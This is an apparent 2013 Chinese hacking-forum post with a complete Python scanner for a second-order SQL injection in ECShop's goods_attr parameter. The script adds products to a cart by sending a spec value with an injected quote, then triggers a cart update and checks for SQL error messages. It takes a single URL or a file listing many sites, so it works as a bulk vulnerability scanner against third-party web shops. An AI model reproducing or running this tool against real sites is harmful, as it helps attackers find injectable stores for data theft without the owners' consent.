介于好久没法帖子了,看到ecshop的goods_attr和goods_attr_id两个二次注入漏洞 ,于是写了这个小工具,由于不会构造语句,只能写出判断漏洞是否存在的工具了,大家海涵,有能构造出语句的,联系我,我再完善一下,

完整代码如下:

#! /usr/bin/env python2.7
#coding=utf-8
#by 少校 QQ1006079161 写入2013年8月14号深夜
#ecshop的goods_attr和goods_attr_id两个二次注入漏洞
#参考[url]https://forum.90sec.org/viewthread.php?tid=6476&highlight=ecshop[/url]
import re
import sys
import getopt
import urllib
import urllib2
import cookielib
def make_order(arg):
    print u'n当前正在检测%s' % arg
    global mdbhack
    run = True
    mdbhack = 1
    url = '%s/flow.php?step=add_to_cart' % arg
    while run and mdbhack<25:#为了效率期间只测试前25个id,可自行增加
        data = '''goods={"quick":1,"spec":["163","163'"],"goods_id":%s,"number":"1","parent":0}''' % mdbhack
        cookiejar = cookielib.CookieJar()
        urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
        urllib2.install_opener(urlOpener) #使用isntall_opener后调用urlopen时会使用这个opener so is good
        try:
            httpres = urlOpener.open(url,data,timeout=5)
            html = httpres.read()
            order_ok = re.search('s1s',html)
            if order_ok:
                print u'[LOG]  自动完成订购订单!'
                goods_attr_sqlinjection(arg)
                run = False
                break
            else:
                print u'[LOG]  自动订购产品id%s失败!' % mdbhack
                mdbhack += 1
            if mdbhack == 25 and run:
                print u'[LOG]  抱歉,前25个id的产品全部订购失败,请手动检测吧!'
        except Exception,e:
            print e
            run = False
            break
def goods_attr_sqlinjection(arg):
    url = arg+'/flow.php'
    html = urllib2.urlopen(url).read()
    good_numbers = re.findall('''name="goods_number[(.*?)]"''',html)[0]#构造good_numbers
    if good_numbers:
        data = 'goods_number%5B'+str(good_numbers)+'''%5D=1&submit=%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5&step=update_cart'''
        request = urllib2.Request(url,data)
        httpres = urllib2.urlopen(request,timeout=10)
        html = httpres.read()
        if re.search('server error|report:Array|You have an error|your SQL syntax|the right syntax to use near',html):
            print u'[LOG]  恭喜您存在goods_attr注入漏洞!'
        else:
       print u'[LOG]  不存在此漏洞'
def main(url,file_txt):
    if url and file_txt:
        printerror()
        sys.exit(1)
    if url:
        make_order(url.strip())
    if file_txt:
        try:
            for url in open(file_txt,'r'):
                make_order(url.strip())
        except Exception,e:
            print e
            sys.exit(1)
def printerror():
    print '''
     ,--^----------,--------,-----,-------^--,
     | |||||||||   `--------'     |          O ..
     `+---------------------------^----------|
       `_,-------, [email]__1006079161@QQ.com______[/email]|
         / XXXXXX /`|     /
        / XXXXXX /  `   /
       / XXXXXX /______(
      / XXXXXX /
     / XXXXXX /
    (________(    For example:
     `------'         scan.py -u [url]http://www.mdbhack.com[/url]
                      scan.py -f ecshop.txt
    '''
if __name__ == '__main__':
    url = None
    file_txt = None
    if len (sys.argv) == 3:
        try:
            opts, args = getopt.getopt (sys.argv[1:], "u:f:")#Assigning Parameters
        except:
            printerror()
            sys.exit(1)
    else:
   printerror()
        sys.exit(1)
    for opt,arg in opts:#Traversal
        if opt == '-u':
            url = arg
        elif opt == '-f':
            file_txt = arg
    main(url,file_txt)

20130815111121
20130815111523
20130815111533

作者:少校 90sec